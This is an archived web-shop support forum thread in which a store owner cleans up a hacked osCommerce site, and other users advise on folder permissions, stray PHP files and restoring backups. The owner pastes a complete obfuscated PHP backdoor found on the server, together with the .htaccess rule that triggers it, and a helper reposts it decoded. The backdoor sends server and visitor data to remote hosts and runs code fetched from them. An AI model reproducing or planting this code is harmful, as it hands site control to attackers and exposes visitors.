Forestshopkeeper Posted October 28, 2008 Posted October 28, 2008 My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read. Thanks Jim
php_Guy Posted October 28, 2008 Posted October 28, 2008 My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.Thanks Jim Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel. Also be sure to install these mods That should take care of the problem.
germ Posted October 28, 2008 Posted October 28, 2008 Your images folder still has hack PHP files in it (looks to me like). If it's set at 777 permissions, there's probably your weak point. Folder permissions should not be higher than 755. File permissions probably not higher than 644. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
php_Guy Posted October 28, 2008 Posted October 28, 2008 After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 Your images folder still has hack PHP files in it (looks to me like). If it's set at 777 permissions, there's probably your weak point. Folder permissions should not be higher than 755. File permissions probably not higher than 644. Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download. Jim
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel. Also be sure to install these mods That should take care of the problem. Thanks. I am working on the mods. I set the folders at 755. files are 644 Jim
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier. Thanks for the info. Jim
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.Jim Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777 Jim
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 Thanks. I am working on the mods. I set the folders at 755. files are 644Jim Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777 Jim
Forestshopkeeper Posted October 28, 2008 Author Posted October 28, 2008 Thanks. I am working on the mods. I set the folders at 755. files are 644Jim is there any particular order to put in these mods? Do I need all of them? Are there any known conflicts between them? Jim
♥Vger Posted October 28, 2008 Posted October 28, 2008 If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755. Either that or get your hosting company to sort out their security. Vger
Forestshopkeeper Posted October 29, 2008 Author Posted October 29, 2008 If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755. Either that or get your hosting company to sort out their security. Vger That makes sense for now till I can sort it out Jim
germ Posted October 29, 2008 Posted October 29, 2008 Recheck your images folder for hack PHP files: 019667.php 23-May-2008 22:30 1k 1019667.php 24-Aug-2008 01:55 1k 19667.php 20-Mar-2008 02:59 1k If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
php_Guy Posted October 29, 2008 Posted October 29, 2008 I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755 Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php Good luck
Forestshopkeeper Posted October 29, 2008 Author Posted October 29, 2008 Recheck your images folder for hack PHP files: 019667.php 23-May-2008 22:30 1k 1019667.php 24-Aug-2008 01:55 1k 19667.php 20-Mar-2008 02:59 1k Thanks. I don't know where they came from, but they are gone now. Jim
germ Posted October 29, 2008 Posted October 29, 2008 They look like the same type of hacked that got me last March. If so, It's not a destructive nor information stealing type of hack. It's a "pay per click" scam. They stick these bogus PHP files around, then seed search engines with links to them, then just set back and rake in the dough (so I've been told). Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard. Just be sure all the folder permission are no higher than 755 and keep an eye on things for a while. If no more hack files show up, you should be OK. By the way, better check your admin folder too, especially your backups folder for your database. They got me there, too. :blush: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Forestshopkeeper Posted October 29, 2008 Author Posted October 29, 2008 I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755 Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php Good luck I am looking at some .htaccess files in my admin folder: This script is in a file called 220009.php <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?> This is what is in the .htaccess file in my backups folder Options -MultiViews ErrorDocument 404 //admin/backups/220009.php In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders. What else can I do? Jim
germ Posted October 29, 2008 Posted October 29, 2008 Both of the files you posted about in the backups folder are bad. Delete them. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Forestshopkeeper Posted October 29, 2008 Author Posted October 29, 2008 Both of the files you posted about in the backups folder are bad. Delete them. Thanks. I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today. Jim
Forestshopkeeper Posted November 3, 2008 Author Posted November 3, 2008 Thanks.I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today. Jim Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder. Jim
Forestshopkeeper Posted November 3, 2008 Author Posted November 3, 2008 Both of the files you posted about in the backups folder are bad. Delete them. Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder. Jim
germ Posted November 3, 2008 Posted November 3, 2008 I can't tell you what it does because the main payload(s) rely on something from another server. All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible): <? error_reporting(0); $s="e"; // get info about this site/page/server $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE); // encode it $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ("http://a.rsdcraft.ws/?".$str); else if ("http://ad.runweb.info/?".$str); else eval("http://7.xmldata.info/?".$str); ?> If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
php_Guy Posted November 3, 2008 Posted November 3, 2008 Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard. no no.. I would not delete and reinstall. It would be easier to manually inspect every file in every folder. I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace. IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection. Unfortunately, some people modify the files live on the server and don't have local files. Those that do backup, (ie - download a full set of files from the server) have a backup of files that could have been infected.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.